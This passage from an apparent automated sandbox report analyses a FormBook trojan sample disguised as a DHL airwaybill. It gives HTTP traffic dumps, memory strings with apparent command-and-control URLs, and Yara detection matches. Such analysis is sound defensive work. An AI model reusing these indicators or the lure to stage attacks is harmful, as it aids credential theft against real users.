            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:08:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:08:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:08:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:08:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Fri, 06 Sep 2024 07:08:20 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 2b b1 8c 3e fb 1f 44 9a fa e1 22 31 46 c6 b5 39 f1 12 f1 6b 1c 98 43 f3 2c 4d 57 c9 70 dc 1c 37 13 fb c2 8e e2 c5 b8 e9 2f bd 85 48 c6 cd 69 14 8b 71 93 33 8f 9b 4e d7 6e d9 ed 71 b3 ef 5e f6 dd 71 d3 6c 98 60 00 f9 ed 55 b8 c0 4b 72 be b8 1f 3e 64 64 6c f8 fb 5a 22 c4 13 21 8c d6 f1 54 98 c3 6b 13 b2 9c 7a 29 b3 a1 f8 65 76 97 90 68 14 da f8 34 6e 5e ac 2c 3f 9c 06 eb 19 b1 fd 19 ff 90 c0 19 ac 58 04 02 65 b5 97 7e 68 7f 4e be 3b 17 f1 a8 67 f7 6c c7 bc b9 39 86 c4 9e 18 1f cf fc c4 98 fb 81 30 f0 d7 5b a7 91 b5 10 a1 88 41 70 46 42 7c 32 5f 87 d3 d4 8f c2 9a df 08 eb d7 e7 5e 6c 44 8d a4 21 8e 75 ba 31 ad 89 fa 75 1a 5f f1 b7 74 74 9d ac 57 a4 49 1f 45 92 26 43 d1 48 fd 25 9e bc e5 6a 58 0b c5 85 f1 3d 10 d7 ed 73 2f 58 8b 77 f3 5a fd e6 38 11 49 02 f4 1f d2 28 86 d4 6d a8 e9 5b 94 b5 16 35 fe eb c3 bb 9f ed 24 8d 51 67 fe fc aa 96 d6 eb 37 28 eb f4 8c c8 dd dc 64 e4 57 35 d0 20 d6 84 3d 45 51 e3 5f c4 34 ad b5 1a ad 06 de bd 10 ea 61 4b dd cd 5e cf 84 bf 38 4b eb f8 8e 52 07 1f 51 8b b5 14 e0 ad fa 31 15 2e 1d 11 97 bf fa 61 da 76 5f c6 b1 77 55 13 f6 02 3c 91 4a 80 77 ef 10 d4 36 35 cc 7a 23 1e 21 ef bd 79 0a 99 a7 c6 d7 e2 a6 7e 1c 8b 74 1d 87 46 6a 0b 28 c1 55 4d 0b 90 c4 57 bf 56 1f c5 68 34 8a 3f a5 bf df d4 73 01 af b5 80 93 0b 9f c4 0f e8 29 34 ca 9c 07 de c2 1c aa 8c 21 80 cc f1 7a 76 d4 9e e2 f7 7c de 1e af e7 a2 35 1f af dd 56 6b 86 df 3d af 2f 53 a0 d9 3b c0 26 25 b0 fa 77 4f 9c e1 93 32 da d9 dc cb f2 ce e6 ed 22 2a fe 04 5a 40 a2 78 20 80 fa b3 67 1b 28 e6 f3 0e 20 26 9d 16 7e 4f 7b e0 29 7b 76 0b cf dd c2 b3 28 3c 17 e0 fb f3 22 79 46 ab Data Ascii: 2756
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Fri, 06 Sep 2024 07:08:23 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 2b b1 8c 3e fb 1f 44 9a fa e1 22 31 46 c6 b5 39 f1 12 f1 6b 1c 98 43 f3 2c 4d 57 c9 70 dc 1c 37 13 fb c2 8e e2 c5 b8 e9 2f bd 85 48 c6 cd 69 14 8b 71 93 33 8f 9b 4e d7 6e d9 ed 71 b3 ef 5e f6 dd 71 d3 6c 98 60 00 f9 ed 55 b8 c0 4b 72 be b8 1f 3e 64 64 6c f8 fb 5a 22 c4 13 21 8c d6 f1 54 98 c3 6b 13 b2 9c 7a 29 b3 a1 f8 65 76 97 90 68 14 da f8 34 6e 5e ac 2c 3f 9c 06 eb 19 b1 fd 19 ff 90 c0 19 ac 58 04 02 65 b5 97 7e 68 7f 4e be 3b 17 f1 a8 67 f7 6c c7 bc b9 39 86 c4 9e 18 1f cf fc c4 98 fb 81 30 f0 d7 5b a7 91 b5 10 a1 88 41 70 46 42 7c 32 5f 87 d3 d4 8f c2 9a df 08 eb d7 e7 5e 6c 44 8d a4 21 8e 75 ba 31 ad 89 fa 75 1a 5f f1 b7 74 74 9d ac 57 a4 49 1f 45 92 26 43 d1 48 fd 25 9e bc e5 6a 58 0b c5 85 f1 3d 10 d7 ed 73 2f 58 8b 77 f3 5a fd e6 38 11 49 02 f4 1f d2 28 86 d4 6d a8 e9 5b 94 b5 16 35 fe eb c3 bb 9f ed 24 8d 51 67 fe fc aa 96 d6 eb 37 28 eb f4 8c c8 dd dc 64 e4 57 35 d0 20 d6 84 3d 45 51 e3 5f c4 34 ad b5 1a ad 06 de bd 10 ea 61 4b dd cd 5e cf 84 bf 38 4b eb f8 8e 52 07 1f 51 8b b5 14 e0 ad fa 31 15 2e 1d 11 97 bf fa 61 da 76 5f c6 b1 77 55 13 f6 02 3c 91 4a 80 77 ef 10 d4 36 35 cc 7a 23 1e 21 ef bd 79 0a 99 a7 c6 d7 e2 a6 7e 1c 8b 74 1d 87 46 6a 0b 28 c1 55 4d 0b 90 c4 57 bf 56 1f c5 68 34 8a 3f a5 bf df d4 73 01 af b5 80 93 0b 9f c4 0f e8 29 34 ca 9c 07 de c2 1c aa 8c 21 80 cc f1 7a 76 d4 9e e2 f7 7c de 1e af e7 a2 35 1f af dd 56 6b 86 df 3d af 2f 53 a0 d9 3b c0 26 25 b0 fa 77 4f 9c e1 93 32 da d9 dc cb f2 ce e6 ed 22 2a fe 04 5a 40 a2 78 20 80 fa b3 67 1b 28 e6 f3 0e 20 26 9d 16 7e 4f 7b e0 29 7b 76 0b cf dd c2 b3 28 3c 17 e0 fb f3 22 79 46 ab Data Ascii: 2756
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Fri, 06 Sep 2024 07:08:26 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 2b b1 8c 3e fb 1f 44 9a fa e1 22 31 46 c6 b5 39 f1 12 f1 6b 1c 98 43 f3 2c 4d 57 c9 70 dc 1c 37 13 fb c2 8e e2 c5 b8 e9 2f bd 85 48 c6 cd 69 14 8b 71 93 33 8f 9b 4e d7 6e d9 ed 71 b3 ef 5e f6 dd 71 d3 6c 98 60 00 f9 ed 55 b8 c0 4b 72 be b8 1f 3e 64 64 6c f8 fb 5a 22 c4 13 21 8c d6 f1 54 98 c3 6b 13 b2 9c 7a 29 b3 a1 f8 65 76 97 90 68 14 da f8 34 6e 5e ac 2c 3f 9c 06 eb 19 b1 fd 19 ff 90 c0 19 ac 58 04 02 65 b5 97 7e 68 7f 4e be 3b 17 f1 a8 67 f7 6c c7 bc b9 39 86 c4 9e 18 1f cf fc c4 98 fb 81 30 f0 d7 5b a7 91 b5 10 a1 88 41 70 46 42 7c 32 5f 87 d3 d4 8f c2 9a df 08 eb d7 e7 5e 6c 44 8d a4 21 8e 75 ba 31 ad 89 fa 75 1a 5f f1 b7 74 74 9d ac 57 a4 49 1f 45 92 26 43 d1 48 fd 25 9e bc e5 6a 58 0b c5 85 f1 3d 10 d7 ed 73 2f 58 8b 77 f3 5a fd e6 38 11 49 02 f4 1f d2 28 86 d4 6d a8 e9 5b 94 b5 16 35 fe eb c3 bb 9f ed 24 8d 51 67 fe fc aa 96 d6 eb 37 28 eb f4 8c c8 dd dc 64 e4 57 35 d0 20 d6 84 3d 45 51 e3 5f c4 34 ad b5 1a ad 06 de bd 10 ea 61 4b dd cd 5e cf 84 bf 38 4b eb f8 8e 52 07 1f 51 8b b5 14 e0 ad fa 31 15 2e 1d 11 97 bf fa 61 da 76 5f c6 b1 77 55 13 f6 02 3c 91 4a 80 77 ef 10 d4 36 35 cc 7a 23 1e 21 ef bd 79 0a 99 a7 c6 d7 e2 a6 7e 1c 8b 74 1d 87 46 6a 0b 28 c1 55 4d 0b 90 c4 57 bf 56 1f c5 68 34 8a 3f a5 bf df d4 73 01 af b5 80 93 0b 9f c4 0f e8 29 34 ca 9c 07 de c2 1c aa 8c 21 80 cc f1 7a 76 d4 9e e2 f7 7c de 1e af e7 a2 35 1f af dd 56 6b 86 df 3d af 2f 53 a0 d9 3b c0 26 25 b0 fa 77 4f 9c e1 93 32 da d9 dc cb f2 ce e6 ed 22 2a fe 04 5a 40 a2 78 20 80 fa b3 67 1b 28 e6 f3 0e 20 26 9d 16 7e 4f 7b e0 29 7b 76 0b cf dd c2 b3 28 3c 17 e0 fb f3 22 79 46 ab Data Ascii: 2756
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.000000000438A000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003DDA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://homebizsuccess.blog/xvas/?FR=J9/McS
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000051AC000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004BFC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7
            Source: toceDGfrPzLv.exe, 00000005.00000002.4609561064.0000000005FCC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moveon.cat
            Source: toceDGfrPzLv.exe, 00000005.00000002.4609561064.0000000005FCC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moveon.cat/bb55/
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000049D2000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004422000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.0000000004E88000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.00000000048D8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.0000000004E88000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.00000000048D8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mshta.exe, 00000006.00000003.2554930126.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
